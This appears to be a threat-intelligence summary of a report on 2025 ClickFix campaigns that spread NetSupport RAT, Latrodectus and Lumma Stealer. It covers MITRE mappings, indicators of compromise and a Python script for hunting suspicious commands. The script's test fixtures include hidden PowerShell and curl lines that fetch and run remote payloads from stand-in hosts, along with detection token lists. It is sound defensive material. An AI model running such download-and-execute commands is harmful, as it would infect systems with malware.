The article explores the rising threat of ClickFix campaigns, detailing how attackers use social engineering to trick users into executing malicious commands across various industries in 2025. It highlights prominent campaigns delivering NetSupport RAT, Latrodectus, and Lumma Stealer malware and provides hunting and mitigation strategies to combat these threats. #ClickFix #NetSupportRAT #Latrodectus #LummaStealer
Keypoints
- ClickFix is a social engineering technique that tricks users into manually running malicious commands via clipboard hijacking and “pastejacking.”
- Prominent ClickFix campaigns in 2025 include those distributing NetSupport RAT, Latrodectus malware, and Lumma Stealer, affecting industries such as healthcare, legal services, automotive, and energy.
- NetSupport RAT campaigns use fake landing pages mimicking DocuSign and Okta to lure victims and employ a new loader that sideloads malicious DLLs for stealthy infections.
- Latrodectus campaigns leverage compromised websites and ClearFake infrastructure to redirect victims to fake verification pages that inject malicious PowerShell commands for initial access.
- Lumma Stealer campaigns utilize typosquatted IP Logger domains and AutoIt scripting for payload delivery and execution, with wide industry targeting.
- Hunting ClickFix infections involves monitoring RunMRU registry keys for suspicious commands and detecting Win+X terminal-based executions by correlating event logs with clipboard activity.
- Palo Alto Networks provides protection through Advanced WildFire, Advanced URL Filtering, DNS Security, Cortex XDR, and XSIAM with behavioral threat protection against these campaigns.
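The hunting guidance above (RunMRU history and Win+X terminal launches) can be turned into a small triage script. The following is an added example, not code from the Unit 42 article or from Palo Alto Networks: it parses the Explorer RunMRU value layout, scores each command for lure-like fragments, and correlates an interactive shell opened from Explorer or Windows Terminal with a suspicious PowerShell script block. All sample data is constructed; the RunMRU key path and value format are real Windows conventions, while the event field names are an assumed, simplified normalisation of Security 4688 and PowerShell 4104 records, and the interpreter and token lists are assumed beyond the PowerShell and curl.exe the article names.

```python
"""Added example, not code from the Unit 42 article or Palo Alto Networks:
triage of Explorer RunMRU entries and process / script-block records for
ClickFix-style activity. All sample data is constructed. The RunMRU key path
and value layout are real Windows conventions; the event field names are an
assumed, simplified normalisation of Security 4688 and PowerShell 4104 records."""
import re
from dataclasses import dataclass

RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Interpreters and download utilities abused by ClickFix lures. The article
# names PowerShell and curl.exe; the remaining entries are assumed additions.
INTERPRETERS = {"powershell", "pwsh", "cmd", "mshta", "curl", "wscript",
                "cscript", "certutil", "bitsadmin"}
# Command-line fragments typical of "paste this to fix it" lures (assumed set).
TOKEN_PATTERNS = [re.compile(p) for p in (
    r"-w(?:indowstyle)?\s+hidden", r"-enc(?:odedcommand)?\b", r"\biex\b",
    r"\binvoke-expression\b", r"\birm\b", r"\binvoke-webrequest\b",
    r"\bdownloadstring\b", r"https?://", r"-nop\b",
    r"-e(?:xecutionpolicy|p)\s+bypass")]


@dataclass
class Finding:
    source: str      # "RunMRU:<slot>" or "pid:<n>"
    command: str
    reasons: list


def parse_runmru(values):
    """Return (slot, command) pairs, most recent first.

    Explorer stores each Run-box command under a one-letter value with a
    trailing '\\1'; the 'MRUList' value lists those letters, newest first."""
    out = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is not None:
            out.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return out


def score_command(cmd):
    """Return the reasons a command looks like a ClickFix payload ([] if not)."""
    low = cmd.strip().lower()
    head = re.split(r"\s+", low, maxsplit=1)[0].strip('"')
    binary = head.rsplit("\\", 1)[-1]
    binary = binary[:-4] if binary.endswith(".exe") else binary
    is_interp = binary in INTERPRETERS
    hits = [f"token:{p.pattern}" for p in TOKEN_PATTERNS if p.search(low)]
    # Flag an interpreter launched with any lure-like fragment, or two or
    # more fragments regardless of the binary (e.g. a bare URL plus download).
    if (is_interp and hits) or len(hits) >= 2:
        return ([f"interpreter:{binary}"] if is_interp else []) + hits
    return []


def hunt_runmru(values):
    """Flag Run-box history entries that look like pasted ClickFix commands."""
    return [Finding(f"RunMRU:{slot}", cmd, r)
            for slot, cmd in parse_runmru(values) if (r := score_command(cmd))]


def hunt_events(events):
    """Correlate an interactive shell opened from Explorer or Windows Terminal
    (the Win+X / Power User menu path) with a suspicious script block run in it."""
    shells = {"powershell.exe", "pwsh.exe", "cmd.exe"}
    launchers = {"explorer.exe", "windowsterminal.exe"}
    interactive = {e["pid"] for e in events if e["id"] == 4688
                   and e["image"].lower() in shells
                   and e["parent"].lower() in launchers}
    return [Finding(f"pid:{e['pid']}", e["script"], r) for e in events
            if e["id"] == 4104 and e["pid"] in interactive
            and (r := score_command(e["script"]))]


# Constructed fixtures: a RunMRU export and four normalised event records.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/fix)"\\1',
}
SAMPLE_EVENTS = [
    {"id": 4688, "pid": 4120, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe"},
    {"id": 4104, "pid": 4120,
     "script": "curl.exe -o $env:TEMP\\u.bin https://cdn.example.invalid/u; Start-Process $env:TEMP\\u.bin"},
    {"id": 4688, "pid": 5004, "image": "powershell.exe", "parent": "code.exe",
     "cmdline": "powershell.exe -NoProfile"},
    {"id": 4104, "pid": 5004, "script": "Get-ChildItem -Recurse | Measure-Object"},
]

if __name__ == "__main__":
    for f in hunt_runmru(SAMPLE_RUNMRU) + hunt_events(SAMPLE_EVENTS):
        print(f.source, "->", f.command, "|", ", ".join(f.reasons))
```

Run against a real host by exporting the RunMRU key for each user profile and feeding normalised 4688/4104 records in place of the fixtures. A bare `powershell` typed into the Run box is deliberately not flagged on its own; the two-signal rule (interpreter plus lure fragment, or two fragments) keeps the noise from administrators down, and the pid correlation in `hunt_events` ties the pasted script back to a shell the user opened interactively rather than one spawned by a scheduled task or another tool.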
MITRE Techniques
- [T1059] Command and Scripting Interpreter – ClickFix lures inject malicious commands into the clipboard for users to paste into Run or terminal windows (‘the malicious JavaScript backend injects a PowerShell command into the endpoint’s clipboard’).
- [T1543] Create or Modify System Process – The NetSupport RAT loader creates scheduled tasks to maintain persistence (‘the loader then sets up persistence for the RAT by creating a scheduled task’).
- [T1129] Shared Modules – NetSupport RAT loader sideloads a malicious DLL using a legitimate executable (‘jp2launcher.exe sideloads a malicious loader named msvcp140.dll’).
- [T1204] User Execution – The attacks rely on social engineering to trick users into manually running malicious commands (‘ClickFix technique tricks potential victims into executing malicious commands’).
- [T1071] Application Layer Protocol – Downloading payloads via HTTP/HTTPS from attacker-controlled domains (‘the DLL downloads encrypted binaries from the C2 server via curl.exe’).
- [T1056] Input Capture – Clipboard hijacking used to inject malicious commands (‘webpages using ClickFix inject malicious script or commands into a potential victim’s clipboard’).
- [T1036] Masquerading – Use of fake landing pages mimicking legitimate services like DocuSign and Okta (‘fake DocuSign and Okta landing pages’).
- [T1055] Process Injection – Latrodectus injects shellcode into sideloaded legitimate binaries (‘the legitimate file side-loads the malicious DLL for Latrodectus, it injects shellcode into itself’).
Indicators of Compromise
- [SHA256 Hashes] Examples from Lumma Stealer – PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef; Boat.pst (CAB file): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7
- [Domains] Lumma Stealer campaign – iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, and pub-*.r2[.]dev domains
- [SHA256 Hashes] Examples from Latrodectus – libecf.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1; PowerShell downloader: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
- [C2 URLs] Latrodectus examples – hxxps[:]//webbs[.]live/on/, hxxps[:]//diab[.]live/up/, hxxps[:]//mhbr[.]live/do/, and others ending with .live domains
- [SHA256 Hashes] NetSupport RAT loader samples – data_3.bin: 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D, msvcp140.dll loader: CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
- [Domains] NetSupport RAT loader distribution – oktacheck.it[.]com, docusign.sa[.]com, doccsign.it[.]com, loyalcompany[.]net
- [IP Address] NetSupport RAT example – 80.77.23[.]48 associated with C2 server and download requests
Read more: https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/